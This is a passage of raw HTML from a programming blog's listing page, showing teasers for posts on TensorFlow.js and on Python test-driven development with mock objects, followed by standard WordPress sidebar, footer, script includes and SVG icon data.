class="screen-reader-text" datetime="2019-03-18T08:34:07+02:00">March 18, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/03/18/introduction-to-tensorflow-js-with-real-world-example/#comments">2<span class="screen-reader-text"> comments on &ldquo;Introduction to Tensorflow.js with Real-World Example&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/03/18/introduction-to-tensorflow-js-with-real-world-example/" rel="bookmark">Introduction to Tensorflow.js with Real-World Example</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/javascript/" rel="category tag">JavaScript</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/03/18/introduction-to-tensorflow-js-with-real-world-example/" class="thumb-link"> <img width="760" height="300" src="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?resize=760%2C300&amp;ssl=1 760w, https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9053" data-permalink="https://rubikscode.net/2019/03/18/introduction-to-tensorflow-js-with-real-world-example/tensorflow-js/" data-orig-file="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Tensorflow js" data-image-description="" data-medium-file="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>The code that accompanies this article can be downloaded here. Open-source library TensorFlow.js was introduced about a year ago. However, I didn't manage to try it out up until now. In this article, we are going to get to know how&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/03/18/introduction-to-tensorflow-js-with-real-world-example/" class="more-link">Read More <span class="screen-reader-text">Introduction to Tensorflow.js with Real-World Example</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9013" class="post-9013 post type-post status-publish format-standard has-post-thumbnail hentry category-python tag-mock tag-mock-objects tag-python tag-software tag-software-craft tag-software-craftsmanship tag-software-development tag-tdd tag-test-driven-development tag-testing tag-unit-tests"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/03/11/test-driven-development-tdd-with-python-mock-objects/"><span class="day" aria-hidden="true">11</span><span class="month" aria-hidden="true">Mar</span><time class="screen-reader-text" datetime="2019-03-11T08:30:12+02:00">March 11, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/03/11/test-driven-development-tdd-with-python-mock-objects/#comments">1<span class="screen-reader-text"> comment on &ldquo;Test Driven Development (TDD) with Python &#8211; Mock Objects&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/03/11/test-driven-development-tdd-with-python-mock-objects/" rel="bookmark">Test Driven Development (TDD) with Python &#8211; Mock Objects</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/python/" rel="category tag">Python</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/03/11/test-driven-development-tdd-with-python-mock-objects/" class="thumb-link"> <img width="760" height="300" src="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?resize=760%2C300&amp;ssl=1 760w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9023" data-permalink="https://rubikscode.net/2019/03/11/test-driven-development-tdd-with-python-mock-objects/tdd-python-mocking/" data-orig-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="TDD Python Mocking" data-image-description="" data-medium-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/TDD-Python-Mocking.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>In the previous article, we had a chance to explore some of the main concepts behind Test Driven Development and use them in Python. This approach of development utilizes unit tests as its driving force. Over the years, it has&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/03/11/test-driven-development-tdd-with-python-mock-objects/" class="more-link">Read More <span class="screen-reader-text">Test Driven Development (TDD) with Python &#8211; Mock Objects</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://rubikscode.net/page/2/'>2</a> <a class='page-numbers' href='https://rubikscode.net/page/3/'>3</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://rubikscode.net/page/9/'>9</a> <a class="next page-numbers" href="https://rubikscode.net/page/2/">Next</a></div> </nav> </main><!-- #main --> </div><!-- #primary --> <div class="col-lg-4 col-md-4 sidebar-section"> <div id="secondary" class="widget-area" role="complementary"> <aside id="blog_subscription-5" class="widget widget_blog_subscription jetpack_subscription_widget"><h2 class="widget-title">Subscribe to Rubik&#039;s Code via Email</h2> <form action="#" method="post" accept-charset="utf-8" id="subscribe-blog-blog_subscription-5"> <p id="subscribe-email"> <label id="jetpack-subscribe-label" class="screen-reader-text" for="subscribe-field-blog_subscription-5"> Email Address </label> <input type="email" name="email" required="required" class="required" value="" id="subscribe-field-blog_subscription-5" placeholder="Email Address"/> </p> <p id="subscribe-submit"> <input type="hidden" name="action" value="subscribe"/> <input type="hidden" name="source" value="https://rubikscode.net/"/> <input type="hidden" name="sub-type" value="widget"/> <input type="hidden" name="redirect_fragment" value="blog_subscription-5"/> <button type="submit" name="jetpack_subscriptions_widget" > Subscribe </button> </p> </form> </aside><aside id="metaslider_widget-2" class="widget widget_metaslider_widget"><h2 class="widget-title">Video Courses</h2><div style="max-width: 260px; margin: 0 auto;" class="ml-slider-3-13-1 metaslider metaslider-responsive metaslider-8321 ml-slider"> <div id="metaslider_container_8321"> <ul id='metaslider_8321' class='rslides'> <li><a href="https://www.packtpub.com/application-development/introducing-test-driven-development-c-video" target="_blank"><img src="https://rubikscode.net/wp-content/uploads/2018/06/EDHIXBY1-260x350.png" height="350" width="260" alt="" class="slider-8321 slide-8325" title="EDHIXBY[1]" /><div class="caption-wrap"><div class="caption">Introducing Test Driven Development in C# </div></div></a></li> <li style='display: none;'><a href="https://www.packtpub.com/application-development/test-driven-development-c-and-net-core-mvc-video" target="_blank"><img src="https://rubikscode.net/wp-content/uploads/2018/06/ZkL0Nwh1-260x350.png" height="350" width="260" alt="" class="slider-8321 slide-8324" title="ZkL0Nwh[1]" /><div class="caption-wrap"><div class="caption">Test Driven Development with C# and .NET Core MVC</div></div></a></li> <li style='display: none;'><a href="https://www.packtpub.com/big-data-and-business-intelligence/real-world-machine-learning-projects-scikit-learn-video" target="_blank"><img src="https://rubikscode.net/wp-content/uploads/2018/09/V10750_Low-260x350.png" height="350" width="260" alt="" class="slider-8321 slide-8440" title="V10750_Low" /><div class="caption-wrap"><div class="caption">Real-World Machine Learning Projects with Scikit-Learn</div></div></a></li> </ul> </div> </div></aside><aside id="jetpack_widget_social_icons-4" class="widget jetpack_widget_social_icons"><h2 class="widget-title">Follow Rubik&#8217;s Code</h2> <ul class="jetpack-social-widget-list size-medium"> <li class="jetpack-social-widget-item"> <a href="https://www.linkedin.com/in/nmzivkovic/" target="_blank"> <span class="screen-reader-text">LinkedIn</span><svg class="icon icon-linkedin" aria-hidden="true" role="img"> <use href="#icon-linkedin" xlink:href="#icon-linkedin"></use> </svg> </a> </li> <li class="jetpack-social-widget-item"> <a href="https://twitter.com/NMZivkovic" target="_blank"> <span class="screen-reader-text">Twitter</span><svg class="icon icon-twitter" aria-hidden="true" role="img"> <use href="#icon-twitter" xlink:href="#icon-twitter"></use> </svg> </a> </li> <li class="jetpack-social-widget-item"> <a href="https://github.com/NMZivkovic" target="_blank"> <span class="screen-reader-text">GitHub</span><svg class="icon icon-github" aria-hidden="true" role="img"> <use href="#icon-github" xlink:href="#icon-github"></use> </svg> </a> </li> <li class="jetpack-social-widget-item"> <a href="https://www.facebook.com/rubikscodenet" target="_blank"> <span class="screen-reader-text">Facebook</span><svg class="icon icon-facebook" aria-hidden="true" role="img"> <use href="#icon-facebook" xlink:href="#icon-facebook"></use> </svg> </a> </li> </ul> </aside><aside id="eu_cookie_law_widget-2" class="widget widget_eu_cookie_law_widget"><div class="hide-on-button" data-hide-timeout="30" data-consent-expiration="180" id="eu-cookie-law" > <form method="post"> <input type="submit" value="Close and accept" class="accept" /> </form> Privacy &amp; Cookies: This site uses cookies. By continuing to use this website, you agree to their use. <br /> To find out more, including how to control cookies, see here: <a href="https://automattic.com/cookies/" > Info </a> </div> </aside> </div><!-- #secondary --> </div><!-- .sidebar-section --> </div><!-- .row --> </div><!-- .container --> </div><!-- #content --> <footer id="colophon" class="site-footer" role="contentinfo"> <button id="gotop-button" class="clean-button has-icon gotop" type="button"> <span class="screen-reader-text">Go to the top</span> </button> <div class="footer-widget-area container"> <div class="row"> <div class="col-lg-4 col-md-4 footer-widget"><aside id="nav_menu-3" class="widget widget_nav_menu"><h2 class="widget-title">Products</h2><div class="menu-products-container"><ul id="menu-products" class="menu"><li id="menu-item-8138" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8138"><a href="https://www.packtpub.com/application-development/introducing-test-driven-development-c-video">Introducing Test Driven Development in C#</a></li> <li id="menu-item-8369" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8369"><a href="https://www.packtpub.com/application-development/test-driven-development-c-and-net-core-mvc-video">Test Driven Development with C# and .NET Core MVC</a></li> <li id="menu-item-8442" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8442"><a href="https://www.packtpub.com/big-data-and-business-intelligence/real-world-machine-learning-projects-scikit-learn-video">Real-World Machine Learning Projects with Sci-Kit Learn</a></li> </ul></div></aside></div><!-- .col --><div class="col-lg-4 col-md-4 footer-widget"><aside id="nav_menu-4" class="widget widget_nav_menu"><h2 class="widget-title">Series</h2><div class="menu-series-container"><ul id="menu-series" class="menu"><li id="menu-item-8370" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8370"><a href="https://rubikscode.net/2018/02/19/artificial-neural-networks-series/">Artificial Neural Networks Series</a></li> <li id="menu-item-8391" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8391"><a href="https://rubikscode.net/2018/07/23/machine-learning-with-ml-net-series/">Machine Learning with ML.NET Series</a></li> <li id="menu-item-8425" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8425"><a href="https://rubikscode.net/2018/08/06/asynchronous-programming-in-net/">Asynchronous Programming in .NET Series</a></li> <li id="menu-item-8371" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8371"><a href="https://rubikscode.net/2017/10/16/mongodb-serial/">MongoDB Series</a></li> <li id="menu-item-8372" class="menu-item menu-item-type-post_type menu-item-object-post menu-item-8372"><a href="https://rubikscode.net/2018/04/30/philosophy-as-motivational-tool-for-software-crafters-series/">Philosophy as Motivational Tool for Software Crafters Series</a></li> </ul></div></aside></div><!-- .col --><div class="col-lg-4 col-md-4 footer-widget"><aside id="nav_menu-6" class="widget widget_nav_menu"><h2 class="widget-title">Rubik&#8217;s Code</h2><div class="menu-rubiks-code-container"><ul id="menu-rubiks-code" class="menu"><li id="menu-item-8374" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8374"><a href="https://rubikscode.net/about/">About</a></li> <li id="menu-item-8375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8375"><a href="https://rubikscode.net/contact/">Contact</a></li> </ul></div></aside></div><!-- .col --> </div><!-- .row --> </div><!-- .footer-widget-area --> <div class="footer-bottom"> <div class="container clearfix"> <div class="pull-left footer-links"> <div class="site-info"> <a></a> </div><!-- .site-info --> </div><!-- .footer-links --> <nav class="pull-right social-links social-list" role="navigation" aria-label="Social navigation"> <ul id="menu-social-media-1" class="menu-items list-unstyled clearfix"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12"><a href="https://www.linkedin.com/in/nmzivkovic/"><span class="screen-reader-text social-meta">LinkedIn</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13"><a href="https://twitter.com/NMZivkovic?lang=en"><span class="screen-reader-text social-meta">Twitter</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8042"><a href="https://www.facebook.com/rubikscodenet/"><span class="screen-reader-text social-meta">FB</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5483"><a href="https://github.com/NMZivkovic"><span class="screen-reader-text social-meta">Git</span></a></li> </ul> </nav><!-- .social-list --> </div><!-- .container --> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <!-- --> <!-- Your Google Analytics Plugin is missing the tracking ID --> <div style="display:none"> </div> <script type="text/javascript"> var c = document.body.className; c = c.replace( /everest-forms-no-js/, 'everest-forms-js' ); document.body.className = c; </script> <link rel='stylesheet' id='metaslider-responsive-slider-css' href='https://rubikscode.net/wp-content/plugins/ml-slider/assets/sliders/responsiveslides/responsiveslides.css?ver=3.13.1' type='text/css' media='all' property='stylesheet' /> <link rel='stylesheet' id='metaslider-public-css' href='https://rubikscode.net/wp-content/plugins/ml-slider/assets/metaslider/public.css?ver=3.13.1' type='text/css' media='all' property='stylesheet' /> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://rubikscode.net/wp-content/themes/fortune/js/tipr.js?ver=1.0.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var fortuneScreenReaderText = {"expand":"Expand child menu","collapse":"Collapse child menu"}; /* ]]> */ </script> <script type='text/javascript' src='https://rubikscode.net/wp-content/themes/fortune/js/fortune.js?ver=1.5.0'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/widgets/eu-cookie-law/eu-cookie-law.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var q2w3_sidebar_options = [{"sidebar":"sidebar-1","margin_top":111,"margin_bottom":0,"stop_id":"","screen_max_width":0,"screen_max_height":0,"width_inherit":false,"refresh_interval":1500,"window_load_hook":false,"disable_mo_api":false,"widgets":["blog_subscription-5","metaslider_widget-2","jetpack_widget_social_icons-4"]}]; /* ]]> */ </script> <script type='text/javascript' src='https://rubikscode.net/wp-content/plugins/q2w3-fixed-widget/js/q2w3-fixed-widget.min.js?ver=5.1.7'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/likes/queuehandler.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/rubikscode.net\/wp-admin\/admin-ajax.php","nonce":"290ba9ff88","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/rubikscode.net\/wp-login.php?redirect_to=https%3A%2F%2Frubikscode.net%2F2019%2F05%2F13%2Fmathematics-for-artificial-intelligence-calculus-optimization%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/shortcodes/js/gist.min.js'></script> <script type='text/javascript' src='https://rubikscode.net/wp-content/plugins/ml-slider/assets/sliders/responsiveslides/responsiveslides.min.js?ver=3.13.1'></script> <script type='text/javascript'> var metaslider_8321 = function($) { $('#metaslider_8321').responsiveSlides({ timeout:3000, pager:true, nav:false, pause:true, speed:600, prevText:"Previous", nextText:"Next", auto:true }); $(document).trigger('metaslider/initialized', '#metaslider_8321'); }; var timer_metaslider_8321 = function() { var slider = !window.jQuery ? window.setTimeout(timer_metaslider_8321, 100) : !jQuery.isReady ? window.setTimeout(timer_metaslider_8321, 1) : metaslider_8321(window.jQuery); }; timer_metaslider_8321(); </script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'128253944',post:'0',tz:'2',srv:'rubikscode.net'} ]); _stq.push([ 'clickTrackerInit', '128253944', '0' ]); </script> <svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <defs> <symbol id="icon-500px" viewBox="0 0 24 24"> <path d="M6.94026,15.1412c.00437.01213.108.29862.168.44064a6.55008,6.55008,0,1,0,6.03191-9.09557,6.68654,6.68654,0,0,0-2.58357.51467A8.53914,8.53914,0,0,0,8.21268,8.61344L8.209,8.61725V3.22948l9.0504-.00008c.32934-.0036.32934-.46353.32934-.61466s0-.61091-.33035-.61467L7.47248,2a.43.43,0,0,0-.43131.42692v7.58355c0,.24466.30476.42131.58793.4819.553.11812.68074-.05864.81617-.2457l.018-.02481A10.52673,10.52673,0,0,1,9.32258,9.258a5.35268,5.35268,0,1,1,7.58985,7.54976,5.417,5.417,0,0,1-3.80867,1.56365,5.17483,5.17483,0,0,1-2.69822-.74478l.00342-4.61111a2.79372,2.79372,0,0,1,.71372-1.78792,2.61611,2.61611,0,0,1,1.98282-.89477,2.75683,2.75683,0,0,1,1.95525.79477,2.66867,2.66867,0,0,1,.79656,1.909,2.724,2.724,0,0,1-2.75849,2.748,4.94651,4.94651,0,0,1-.86254-.13719c-.31234-.093-.44519.34058-.48892.48349-.16811.54966.08453.65862.13687.67489a3.75751,3.75751,0,0,0,1.25234.18375,3.94634,3.94634,0,1,0-2.82444-6.742,3.67478,3.67478,0,0,0-1.13028,2.584l-.00041.02323c-.0035.11667-.00579,2.881-.00644,3.78811l-.00407-.00451a6.18521,6.18521,0,0,1-1.0851-1.86092c-.10544-.27856-.34358-.22925-.66857-.12917-.14192.04372-.57386.17677-.47833.489Zm4.65165-1.08338a.51346.51346,0,0,0,.19513.31818l.02276.022a.52945.52945,0,0,0,.3517.18416.24242.24242,0,0,0,.16577-.0611c.05473-.05082.67382-.67812.73287-.738l.69041.68819a.28978.28978,0,0,0,.21437.11032.53239.53239,0,0,0,.35708-.19486c.29792-.30419.14885-.46821.07676-.54751l-.69954-.69975.72952-.73469c.16-.17311.01874-.35708-.12218-.498-.20461-.20461-.402-.25742-.52855-.14083l-.7254.72665-.73354-.73375a.20128.20128,0,0,0-.14179-.05695.54135.54135,0,0,0-.34379.19648c-.22561.22555-.274.38149-.15656.5059l.73374.7315-.72942.73072A.26589.26589,0,0,0,11.59191,14.05782Zm1.59866-9.915A8.86081,8.86081,0,0,0,9.854,4.776a.26169.26169,0,0,0-.16938.22759.92978.92978,0,0,0,.08619.42094c.05682.14524.20779.531.50006.41955a8.40969,8.40969,0,0,1,2.91968-.55484,7.87875,7.87875,0,0,1,3.086.62286,8.61817,8.61817,0,0,1,2.30562,1.49315.2781.2781,0,0,0,.18318.07586c.15529,0,.30425-.15253.43167-.29551.21268-.23861.35873-.4369.1492-.63538a8.50425,8.50425,0,0,0-2.62312-1.694A9.0177,9.0177,0,0,0,13.19058,4.14283ZM19.50945,18.6236h0a.93171.93171,0,0,0-.36642-.25406.26589.26589,0,0,0-.27613.06613l-.06943.06929A7.90606,7.90606,0,0,1,7.60639,18.505a7.57284,7.57284,0,0,1-1.696-2.51537,8.58715,8.58715,0,0,1-.5147-1.77754l-.00871-.04864c-.04939-.25873-.28755-.27684-.62981-.22448-.14234.02178-.5755.088-.53426.39969l.001.00712a9.08807,9.08807,0,0,0,15.406,4.99094c.00193-.00192.04753-.04718.0725-.07436C19.79425,19.16234,19.87422,18.98728,19.50945,18.6236Z"/> </symbol> <symbol id="icon-amazon" viewBox="0 0 24 24"> <path d="M13.582,8.182C11.934,8.367,9.78,8.49,8.238,9.166c-1.781,0.769-3.03,2.337-3.03,4.644 c0,2.953,1.86,4.429,4.253,4.429c2.02,0,3.125-0.477,4.685-2.065c0.516,0.747,0.685,1.109,1.629,1.894 c0.212,0.114,0.483,0.103,0.672-0.066l0.006,0.006c0.567-0.505,1.599-1.401,2.18-1.888c0.231-0.188,0.19-0.496,0.009-0.754 c-0.52-0.718-1.072-1.303-1.072-2.634V8.305c0-1.876,0.133-3.599-1.249-4.891C15.23,2.369,13.422,2,12.04,2 C9.336,2,6.318,3.01,5.686,6.351C5.618,6.706,5.877,6.893,6.109,6.945l2.754,0.298C9.121,7.23,9.308,6.977,9.357,6.72 c0.236-1.151,1.2-1.706,2.284-1.706c0.584,0,1.249,0.215,1.595,0.738c0.398,0.584,0.346,1.384,0.346,2.061V8.182z M13.049,14.088 c-0.451,0.8-1.169,1.291-1.967,1.291c-1.09,0-1.728-0.83-1.728-2.061c0-2.42,2.171-2.86,4.227-2.86v0.615 C13.582,12.181,13.608,13.104,13.049,14.088z M20.683,19.339C18.329,21.076,14.917,22,11.979,22c-4.118,0-7.826-1.522-10.632-4.057 c-0.22-0.199-0.024-0.471,0.241-0.317c3.027,1.762,6.771,2.823,10.639,2.823c2.608,0,5.476-0.541,8.115-1.66 C20.739,18.62,21.072,19.051,20.683,19.339z M21.336,21.043c-0.194,0.163-0.379,0.076-0.293-0.139 c0.284-0.71,0.92-2.298,0.619-2.684c-0.301-0.386-1.99-0.183-2.749-0.092c-0.23,0.027-0.266-0.173-0.059-0.319 c1.348-0.946,3.555-0.673,3.811-0.356C22.925,17.773,22.599,19.986,21.336,21.043z"/> </symbol> <symbol id="icon-apple" viewBox="0 0 24 24"> <path d="M20.07,17.586a10.874,10.874,0,0,1-1.075,1.933,9.822,9.822,0,0,1-1.385,1.674,2.687,2.687,0,0,1-1.78.784,4.462,4.462,0,0,1-1.644-.393,4.718,4.718,0,0,0-1.77-.391,4.878,4.878,0,0,0-1.82.391A4.9,4.9,0,0,1,9.021,22a2.53,2.53,0,0,1-1.82-.8A10.314,10.314,0,0,1,5.752,19.46,11.987,11.987,0,0,1,4.22,16.417a11.143,11.143,0,0,1-.643-3.627,6.623,6.623,0,0,1,.87-3.465A5.1,5.1,0,0,1,6.268,7.483a4.9,4.9,0,0,1,2.463-.695,5.8,5.8,0,0,1,1.9.443,6.123,6.123,0,0,0,1.511.444,9.04,9.04,0,0,0,1.675-.523,5.537,5.537,0,0,1,2.277-.4,4.835,4.835,0,0,1,3.788,1.994,4.213,4.213,0,0,0-2.235,3.827,4.222,4.222,0,0,0,1.386,3.181,4.556,4.556,0,0,0,1.385.909q-.167.483-.353.927ZM16.211,2.4a4.267,4.267,0,0,1-1.094,2.8,3.726,3.726,0,0,1-3.1,1.528A3.114,3.114,0,0,1,12,6.347a4.384,4.384,0,0,1,1.16-2.828,4.467,4.467,0,0,1,1.414-1.061A4.215,4.215,0,0,1,16.19,2a3.633,3.633,0,0,1,.021.4Z"/> </symbol> <symbol id="icon-bandcamp" viewBox="0 0 24 24"> <path d="M15.27 17.289 3 17.289 8.73 6.711 21 6.711 15.27 17.289"/> </symbol> <symbol id="icon-behance" viewBox="0 0 24 24"> <path d="M7.799,5.698c0.589,0,1.12,0.051,1.606,0.156c0.482,0.102,0.894,0.273,1.241,0.507c0.344,0.235,0.612,0.546,0.804,0.938 c0.188,0.387,0.281,0.871,0.281,1.443c0,0.619-0.141,1.137-0.421,1.551c-0.284,0.413-0.7,0.751-1.255,1.014 c0.756,0.218,1.317,0.601,1.689,1.146c0.374,0.549,0.557,1.205,0.557,1.975c0,0.623-0.12,1.161-0.359,1.612 c-0.241,0.457-0.569,0.828-0.973,1.114c-0.408,0.288-0.876,0.5-1.399,0.637C9.052,17.931,8.514,18,7.963,18H2V5.698H7.799 M7.449,10.668c0.481,0,0.878-0.114,1.192-0.345c0.311-0.228,0.463-0.603,0.463-1.119c0-0.286-0.051-0.523-0.152-0.707 C8.848,8.315,8.711,8.171,8.536,8.07C8.362,7.966,8.166,7.894,7.94,7.854c-0.224-0.044-0.457-0.06-0.697-0.06H4.709v2.874H7.449z M7.6,15.905c0.267,0,0.521-0.024,0.759-0.077c0.243-0.053,0.457-0.137,0.637-0.261c0.182-0.12,0.332-0.283,0.441-0.491 C9.547,14.87,9.6,14.602,9.6,14.278c0-0.633-0.18-1.084-0.533-1.357c-0.356-0.27-0.83-0.404-1.413-0.404H4.709v3.388L7.6,15.905z M16.162,15.864c0.367,0.358,0.897,0.538,1.583,0.538c0.493,0,0.92-0.125,1.277-0.374c0.354-0.248,0.571-0.514,0.654-0.79h2.155 c-0.347,1.072-0.872,1.838-1.589,2.299C19.534,18,18.67,18.23,17.662,18.23c-0.701,0-1.332-0.113-1.899-0.337 c-0.567-0.227-1.041-0.544-1.439-0.958c-0.389-0.415-0.689-0.907-0.904-1.484c-0.213-0.574-0.32-1.21-0.32-1.899 c0-0.666,0.11-1.288,0.329-1.863c0.222-0.577,0.529-1.075,0.933-1.492c0.406-0.42,0.885-0.751,1.444-0.994 c0.558-0.241,1.175-0.363,1.857-0.363c0.754,0,1.414,0.145,1.98,0.44c0.563,0.291,1.026,0.686,1.389,1.181 